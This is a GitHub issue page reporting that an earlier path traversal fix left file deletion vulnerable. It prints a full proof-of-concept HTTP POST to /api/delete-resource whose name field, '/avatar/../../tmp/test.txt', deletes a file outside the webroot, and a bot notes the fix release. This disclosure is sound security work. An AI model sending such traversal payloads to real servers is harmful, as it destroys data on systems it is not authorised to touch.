Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi,
I was looking at the fix to #1035:
And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable. Thus, it's possible to delete any file outside application's webroot:
POC request:
POST /api/delete-resource?provider= HTTP/1.1 Host: localhost:8008 Content-Length: 363 sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 sec-ch-ua-platform: "Windows" Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: http://localhost:8008 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8008/resources Accept-Encoding: gzip, deflate Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7 Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383 Connection: close {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}
The text was updated successfully, but these errors were encountered:
@seriouszyx @ComradeProgrammer @Resulte
Sorry, something went wrong.
🎉 This issue has been resolved in version 1.126.1 🎉
The release is available on GitHub release
Your semantic-release bot 📦🚀
hsluoyz
Successfully merging a pull request may close this issue.
Hi,
I was looking at the fix to #1035:

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.

Thus, it's possible to delete any file outside application's webroot:
POC request:
The text was updated successfully, but these errors were encountered: